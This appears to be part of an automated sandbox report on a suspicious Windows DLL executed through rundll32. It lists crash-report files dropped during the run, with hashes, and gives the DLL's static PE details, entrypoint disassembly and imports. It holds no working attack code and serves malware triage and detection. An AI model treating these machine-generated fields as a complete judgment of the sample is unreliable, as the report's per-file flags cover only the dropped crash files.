Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.0.5.6.7.6.4.5.3.9.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.0.5.8.2.1.4.5.3.2.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.0.b.0.f.d.b.-.a.9.3.9.-.4.d.d.8.-.8.0.c.1.-.a.8.1.1.c.8.2.9.9.f.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.9.5.e.8.7.b.-.9.d.e.9.-.4.9.1.2.-.9.1.9.1.-.c.d.b.7.d.8.d.f.8.9.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.c.8.-.0.0.0.1.-.0.0.1.7.-.a.1.8.2.-.1.6.d.6.2.a.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1498.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4771
Entropy (8bit): 4.489938918942838
Encrypted: false
SSDEEP: 48:cvIwSD8zsmJgtWI9siAAWSC8Bb8fm8M4JCds0MFf+q8vjs0c4SrS4d:uITf8WESNWJSuKRcDW4d
MD5: BF63B69EAC990AB6D87408C4E4F97D3F
SHA1: 85D06704174C9C8FE1742B02F9911C07788C7E63
SHA-256: 44EEF58AE3C49362B39C338932BD7640F10E1E481B6BC707393B2E5D1EE96EB2
SHA-512: 2653F3BE41DE081740D62E094CBA6C91DC09DF55509165C3416E049D854D3200E3E2D5D8B2F8BA2C7FEE7B0139A0F0CF349624768440D1CEED0EE52456BE8627
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CE3.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Oct 12 05:36:21 2021, 0x1205a4 type
Category: dropped
Size (bytes): 59254
Entropy (8bit): 1.9634863542101364
Encrypted: false
SSDEEP: 192:aj0QkYA4dJtQhlS2DK0NZh7uP5xZU7KcLG4vPuEeNKolE6ifI7QnSE1Wz9d3:aowbtSbDnhoz/wG4vP4NrlE6lQSiQL3
MD5: 21FC690E719CA0A2B0555CAF4DC9894F
SHA1: 9FFF80005C49B84DEDB89A67E403342106D31056
SHA-256: 0B2CFC574556075A4994FF5510FFFD0DEA968910B8B08E8D160F9E73B2C73E91
SHA-512: 8482E0DF1711B6CA87A192E236CDCDB636DE710DCB2FEFF3BF73F191F31488E44D192192813877F8B6FC99EB7B4875787C215536C7BEA8325BDF77D388A63029
Malicious: false
Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........a.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER39F1.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8306
Entropy (8bit): 3.6948125197877575
Encrypted: false
SSDEEP: 192:Rrl7r3GLNi2IA6y6G6YWo651WgmfTkOSDCpDT89b5Ssffzm:RrlsNim63G6YJ6KgmfTkOS35RfS
MD5: 63792DA1DF75FF4D2EC7D9A25ACC5AEF
SHA1: C7942D021FA364788DD729A675DFB805358CBA84
SHA-256: 831350964B1B96FC83D883BAD10563D9F8CB01B29865BC917948403161B0D1B4
SHA-512: 22B983D28FBC71ECE8D0BDDFA26ACE778DA8ACCEE2F9836D3864253F584031E46EBE19D82283F9416B23124D7A94633942A0E15420624E847100AE775606F40C
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.2.0.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F13.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4630
Entropy (8bit): 4.458084179540214
Encrypted: false
SSDEEP: 48:cvIwSD8zs9JgtWI9siAAWSC8BL8fm8M4JCds9FC+q8/5Z4SrSmd:uITfXWESNmJEGDWmd
MD5: C490845CB287C90988FD6F6CF567DD28
SHA1: 5C7BEE2DC7C4B85A592B569558E138991878A7D0
SHA-256: 5138F57A3B495A7B2638475C4F61D3851192202E4689A4749E4954CE0AA70680
SHA-512: C4C4A55A9D2B5A4B7672168C3ED968A3CDF143E07B244DC6F388360EC9E597C0EB5A48BF2DF40D590195B542FCE84CC2F70FDECDF0570F9EA872080EA8D94987
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206167" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0.tmp.dmp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:36:11 2021, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):34730
                                                                                                                                                                      Entropy (8bit):2.463952054231091
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:AsYKWkS1nV/WjP5MUmpISGG+0CszdbdE1lE1RHEHnlzq:AfrkSwqUo/+0Cszwl0R4lzq
                                                                                                                                                                      MD5:7A5646D47572BB8CFF0CC61340DF4203
                                                                                                                                                                      SHA1:980925704E4ED1FAFAA9C6152E358BE9E1FFA2A9
                                                                                                                                                                      SHA-256:28DEA90303D7A8DA075BBD36DCCAC8FBBDE8C40515F4DFD39D4770E174B195B0
                                                                                                                                                                      SHA-512:14FB9C68EDBD1A420B2637FEDE0B72D722AC9B9A79606046B79F5E9FD78582E02DAAD053B18B1655ADC003D0D8A9B28F2222B134FF57DBDA772342D3C2980461
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........i.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB40.tmp.WERInternalMetadata.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8402
                                                                                                                                                                      Entropy (8bit):3.6993822896284474
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNimj06JVQA6YWDO6ZVthxmgmf8KS9Cpro89bY0sfJIm:RrlsNio06EA6YYO6ZVthxmgmf8KSAYn7
                                                                                                                                                                      MD5:F76740664610671DA6DEC7F8DBF0BEF3
                                                                                                                                                                      SHA1:C0C405E091ED53B8CA110B8885E8BA214D4EC0FB
                                                                                                                                                                      SHA-256:2F27E2B019C3985C6509E88329774C77C5B641DB3EBE14D0F666FD314ABA23F3
                                                                                                                                                                      SHA-512:78218236DD3D944A2FDC43A321C85607EE6B3D8D7AB6BBD0FA217F05F91C223164E00D7DA9BF909D98507E4BD65C6C2DB010EB69A19DE90A175D90DE0128369D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.9.2.<./.P.i.d.>.........
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF86.tmp.WERInternalMetadata.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8404
                                                                                                                                                                      Entropy (8bit):3.699506403638675
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNi9h6tR6YWt6ZVthxmgmf8KS9CprK89bhrsfVLm:RrlsNib6r6Ys6ZVthxmgmf8KSGhwfU
                                                                                                                                                                      MD5:53258A3836AA706F17BA12F50C7F4658
                                                                                                                                                                      SHA1:B0E270CACDF35F9F6B281217868575FF1AB3BB40
                                                                                                                                                                      SHA-256:9E0F6E226E4E0029FE1BF4DD7566B37C712481A0D66B09A25E0FB1E9C86C88E9
                                                                                                                                                                      SHA-512:248F418465686AE8B618B8103B7109F3277DEBC857AA6B82BD6D0DBF0F3B26948792CD0EFAFECCA0328BF68C084951A707CE14E4C44031CDECCC0C3C65B3266A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.0.<./.P.i.d.>.......
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF87.tmp.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4771
                                                                                                                                                                      Entropy (8bit):4.488552391834352
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cvIwSD8zsmJgtWI9siAAWSC8B48fm8M4JCds0MFtP+q8vjs0pI4SrSMd:uITf8WESNDJSCPKRpIDWMd
                                                                                                                                                                      MD5:3C8D2B1AA773525A81E1A2FDB24312D9
                                                                                                                                                                      SHA1:DFD4CA5442CCCA191958EA7501F62BE3DF399B66
                                                                                                                                                                      SHA-256:F49CDC925BE0BE28FB9BC0214F8DF9E51C17D24497FBA4B518A7F70A01A1EDB7
                                                                                                                                                                      SHA-512:8DAAD62180F08DDDC59C4312FF54281D540D15493497B0C192B7E5B17DF8E33AF9223DA5E1526D325B623E57DA6169EF6A5FEC538850969AC34618D48700AD01
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE20.tmp.dmp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:36:09 2021, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):34688
                                                                                                                                                                      Entropy (8bit):2.4757425683465253
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:m/YknY/MxLP5MUmpISGG+0Qsz7zMJsCK/YOrYno1/hAqAPkH0nmMuS:mQkhjqUo/+0Qszf/YUYno1KhU0m5S
                                                                                                                                                                      MD5:E74FA668049BE728B187D9684BC91264
                                                                                                                                                                      SHA1:DF675FD3B4740E011452A38C5CE42286BEB8BB62
                                                                                                                                                                      SHA-256:6442EE5B6A21B283BE6062B04ACBB2E2BC2B23830FB360F459BFA216F6A4BAA8
                                                                                                                                                                      SHA-512:6BFA6C0A16C5BDF78EFBB7924CD25834F50EA65BEC6502703B70B100B201F723A8AC479CFF48CD47856AEB6DF3113327EADE66AE551B2DE2C7D3EDD1691E7AD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T.......|...^.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.669873789159674
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:6yDD19jMIu.dll
File size:718336
MD5:903cf677ba834a968b42bd71e4626a9d
SHA1:c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256:b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
SHA512:b81d6b419c05ac351d086ab9d439b7cf2d8db21208f85b13e483bacb800a811890ca7fc3ce2295d2861f3323b0d52725e27f42758ef4ec6312018b4a7a249095
SSDEEP:12288:1UAQSx16fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsF:1z3x16fq8Np6bTPPaBreaZlYCOSVol2S
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................."w|.............].......].......]......."wf.............].......].......]...............].......Rich...........

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x1003ab77
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5F6FF725 [Sun Sep 27 02:21:25 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:b5c6badd398e2e3aa283a40a40432c6c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F59789E8407h
call 00007F59789E8EF2h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F59789E82AAh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
                                                                                                                                                                      ret
                                                                                                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                      xor ecx, ebp
                                                                                                                                                                      call 00007F59789E8003h
                                                                                                                                                                      jmp 00007F59789E83E0h
                                                                                                                                                                      mov ecx, dword ptr [ebp-14h]
                                                                                                                                                                      xor ecx, ebp
                                                                                                                                                                      call 00007F59789E7FF2h
                                                                                                                                                                      jmp 00007F59789E83CFh
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                      ret
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                      ret
                                                                                                                                                                      push eax
                                                                                                                                                                      inc dword ptr fs:[eax]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xa8990 | 0x80 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa8a10 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x146000 | 0x53d0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa474c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa47a0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7b000 | 0x1fc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x79f71 | 0x7a000 | False | 0.510071801358 | data | 6.75462598911 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7b000 | 0x2e586 | 0x2e600 | False | 0.556366871631 | data | 5.60177209336 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xaa000 | 0x9b19c | 0x1800 | False | 0.190266927083 | data | 4.15778005426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x146000 | 0x53d0 | 0x5400 | False | 0.752650669643 | data | 6.72453697464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
KERNEL32.dll | LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll | CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
